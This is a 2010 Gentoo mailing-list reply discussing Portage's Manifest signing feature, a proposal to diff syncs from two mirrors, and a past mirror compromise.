On Tuesday 06 April 2010 23:16:13 Alan McKinnon wrote: > On Tuesday 06 April 2010 23:46:48 Mark Knecht wrote: > > On Tue, Apr 6, 2010 at 2:26 PM, Alan McKinnon <alan.mckin...@gmail.com> > > wrote: <SNIP> > > > > > FEATURES=sign > > > > > > "man 5 make.conf" implies that the dev signs the Manifest by checking > > > something into the tree using repoman. Presumably, the user either has > > > to fetch the public key or portage includes it in the tree. But > > > documentation in the man pages is sparse, I can't find an explanation > > > of how it should work. > > > > > > > > > -- > > > alan dot mckinnon at gmail dot com > > > > Do you use it? > > Without logging into the mirror host and checking, I really couldn't say. I > mirror what I get from gentoo.org with no alterations. > > I don't use the feature locally on any of my own boxes.
This was an argument against Gentoo more than six or seven years ago with regards to the security of whole portage system. A number of suggestions were made in those early days, one of them being to sync with two mirrors and diff the ebuilds/Manifests/Distfiles affected by these two most recent syncs. As far as I know people didn't go for this because it was perceived that the system as implemented was secure enough and anyway the proposed solution would put too much pressure on the mirrors. BTW, there was some compromise of a mirror in those early days and a lot (well may be a few back then) people had to reinstall because their boxen were compromised, or thought that they might have been! If you google you may find something lurking around from the long arguments that took place and what the D.Robbins said. -- Regards, Mick
signature.asc
Description: This is a digitally signed message part.
